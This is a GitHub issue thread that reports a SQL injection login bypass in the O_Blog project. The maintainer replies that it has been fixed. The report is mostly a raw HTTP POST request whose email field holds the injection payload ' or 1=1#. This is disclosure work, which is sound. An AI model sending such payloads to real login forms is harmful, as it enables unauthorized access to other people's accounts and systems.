### ISSUE TITLE
sql sql injection

### ISSUE THREAD

**Issue by 238469** [berkaygediz/O_Blog#2]
SQL injection bypass login:
POST /O_Blog-main/ HTTP/1.1
Host: 192.168.150.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=9697cab5c5ac6b604b268d245e9a9519
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

eposta=2384693535@qq.com'or 1=1#&sifre=31232132

**Comment by berkaygediz** [comment]
The vulnerability has been fixed. Update is on its way.

**Thanks for reporting the issue.**
